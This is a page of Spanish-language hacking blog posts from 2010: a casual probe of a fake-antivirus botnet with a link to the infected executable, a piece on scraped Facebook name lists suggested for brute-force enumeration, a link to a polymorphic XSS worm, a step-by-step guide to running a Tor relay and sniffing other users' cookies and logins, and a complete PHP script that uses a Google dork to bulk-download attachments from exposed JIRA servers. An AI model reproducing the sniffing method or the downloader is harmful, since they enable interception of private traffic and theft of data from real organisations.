Sniff packets, not glue.

Publicado el 29/07/2010 12:07:00 en Hacking General. Total de votos: 4  Votar

(Todos los archivos, están adjuntos al final :) )

Hola, el otro día navegaba plácidamente y me encontré con una alerta de Windows que simulaba ser un

explorador de XP con un antivirus (bastante bien maqueteado), por lo que me puse a indagar a ver de que

iba todo esto.

Para comenzar, la dirección de descarga era: Sub.dominio.com/main.php?i=[String]&e=[Int]

Lo primero que hice fue hacer un poco de ingeniería inversa para leer los strings del ejecutables, al

no tener muchos conocimientos de ingeniería inversa no pude sacar mucho, excepto que hacia mucha

alusión a la librería "\Windows\system32\IMM32.DLL", la cual es una librería de Windows pero aparece

listada en google en muchos sites de malware.

Procedo a escanear la pagina que alojaba el malware y me encuentro con el directorio /db/ :D



Joya!! scripts para husmear...

Revisando un poco el comportamiento del script, hay dos cosas para destacar:
*El panel en el que se reportan los bots ubicado en "88.85.95.67"
*Una lista de proxy que, según parece se actualiza cada tanto.

Me dirijo a: 88.85.95.67 y por suerte (Para mí :E ) tengo las rutas a la vista, por lo que me dirijo

hasta:



Charan, son todos los sites infectados que tiene. Resulta que este malware infecta, crea subdominios e

infecta desde ahi. Otro comportamiento raro de la botnet, es que una vez que descargué el malware no lo

pude volver a descargar, tuve que buscar otro link. Y todos los subsites cuentan con la carpeta /db/.

Investigando un poco, resulta ser que está alojado en Rusia y algunos (no todos!) sites ya están

marcados como maliciosos.

Buscando un poquito resulta ser que tiene el login acá:



Y esta basado en un CMS que se llama Django.

Hasta acá llego mi curiosidad, diviértanse :D

.Exe infectado + Script en : http://www.megaupload.com/?d=V6JSKJPI

Si encuentran algo más chiflen ;)

Saludos!

Comentarios: 0 | Leer comentarios

Publicado el 28/07/2010 12:07:00 en Hacking Web. Total de votos: 4  Votar

Ron Bowes de SkullSecurity.org publicó ayer un interesante artículo con unos resultados también muy interesantes, y útiles sobre todo: Cómo consiguió un listado con unos 150 millones de usuarios de Facebook. Ni inyección SQL, ni acceso al panel de administrador ni nada de nada. Tranquilidad.

Tras seguir un tweet de FSLabs en el que se indicaba una dirección con una especie de directorio de esta red social (http://www.facebook.com/directory), Ron vió la luz.




Vió la luz, y un buen puñado de nombres y apellidos, como es de esperar en un directorio. Tenía dos opciones: ir nombre por nombre, obteniendo su url de perfil y su nombre y apellidos...o hacerse un pequeño script que hiciese esta labor tan ardua. No era algo descabellado: justamente ya comentamos por aquí como Mark Zuckerberg utilizó estos mismos métodos para engendrar The Facebook.

Y así fue, tras dejar que funcionase un buen rato, obtuvo el listado completo de los usuarios de Facebook que no tuviesen la protección frente a búsquedas activadas en sus opciones de privacidad. Una gran mayoría por lo que parece. Aunque sabemos que hace poco llegó a 500 millones, lo obtenido por Ron es más que suficiente como muestra para su siguiente acción: es el turno de las estadísticas, análisis de todo el directorio obtenido y posterior creación de listas basadas en diferentes criterios (primera letra del nombre seguida de apellidos, nombres de usuarios, nombre con un punto y apellido, etc).

¿Pero para que podrían servirnos estas listas si no nos interesan mucho las estadísticas? Muy sencillo: si os veis en la situación de necesitar una enumeración de usuarios válidos para un servicio (¿alguien ha dicho fuerza bruta? yo no), con esta y otras listas seguro que se consigue por lo menos algún que otro nombre correcto y registrado. Al fin y al cabo, la fuente es más que fidedigna.




Ron ha puesto a disposición de todo el mundo, mediante torrent, el compilado con las listas que os comentamos, el volcado de todo el directorio con direcciones del perfil, nombres, apellidos y demás, así como las herramientas utilizadas, scripts, etc.

En los comentarios, se revelan más direcciones de facebook que podrían resultar interesantes...

Fuente: http://www.securitybydefault.com/2010/07/la-wordlist-por-excelencia-100-millones.html

Comentarios: 0 | Leer comentarios

Publicado el 17/07/2010 12:07:00 en Hacking Web. Total de votos: 2  Votar

Buenas, les dejo un worm que lo que hace es re-encriptarse con cada infección usando un cifrado XOR.
Lo único que le falta, es el código que manda el script ofuscado (guardado en las variables encodeadas) a su proximo target, como puede ser un xss persistente.
Abajo está el código completo. Para verlo en acción, guarden el source en un archivo HTML y después abranlo. El javascipt de salida en el área de texto es el gusano re-encodeado; Para probar el source, reemplacen el javascript de ejemplo que está abajo con el código encriptado y abran la pagina devuelta.


http://code.google.com/p/prion-polymorphic-xss-worm/people/list

Comentarios: 0 | Leer comentarios

Publicado el 07/07/2010 12:07:00 en Hacking General. Total de votos: 4  Votar

Hola, últimamente se hicieron varios post de como navegar "seguramente" con Tor por lo que quería
mostrarles una técnica simple pero copada para capturar trafico al azar que me enseño el buen Decodex01.

Básicamente lo que vamos a hacer es poner nuestra conexión como servidor de Tor para después husmear
todo lo que pase por nuestros cables :D

Vamos a necesitar:
- Tor.
- Un analizador de trafico (Yo uso Wireshark).
- Un sniffer (recomiendo NetWorkMiner).


Una vez que está todo instalado:

1.- Abrimos Vidalia (programa que viene junto con Tor) y lo configuramos de modo tal que cuando hagamos
de puente no nos dossee el exceso de trafico, lo configuramos en:



Después de aceptar los cambios asegurense de que su firewall no bloquee el trafico y de dejar el server
corriendo.

2.- Abrimos el Wireshark, elegimos la interfaze a sniffear y hacemos una nueva captura.


Acá depende de cada uno cuanto decide dejar snifeando, es algo así como pescar xD. Y una vez que creemos
que sniffeamos lo suficiente guardamos la captura (Save as...).

3.- Abrimos el archivo .pcap con el NetWorkMiner, y vamos a ver algo así:



PD: en mi caso no hay casi nada porque lo puse dos minutos para mostrarles el resultado.

Una vez con una buena sesion van a poder encontrar archivos,imagenes,cookies,logins, etc.

Espero les haya gustado :D

Creditos a Decodex01 por la idea.


Comentarios: 0 | Leer comentarios

Publicado el 29/03/2010 12:03:00 en Hacking General. Total de votos: 0  Votar

Buenas buenas, resulta que una aplicación me encontré con que se podía bajar cualquier attachment, el tema que bajar de 1 en 1 era un bajon, por lo que hice el siguiente exploit:

Soft:http://www.atlassian.com/software/jira/
Dork:inurl:/jira/secure/attachment/

<?php

/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google results, otherwise you will get a lot of 404*/


echo "\n############################################################################
# \n#Attachment downloader by Scuarplex\n#";

if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/ 1 12310371#
############################################################################\n";die;}

else{
echo "\n#Let's start!\n";
echo "#\n#scuarplex@Gmail.com\n";
#\n############################################################################\n";}

$url2 = $argv[1];

if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}

if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}

$numero = $argv[2];

for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");

if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);

echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);

}
}
echo "\n#All attachment downloaded correctly!\n";
die;

?>


Comentarios: 0 | Leer comentarios

Ver: Siguientes 5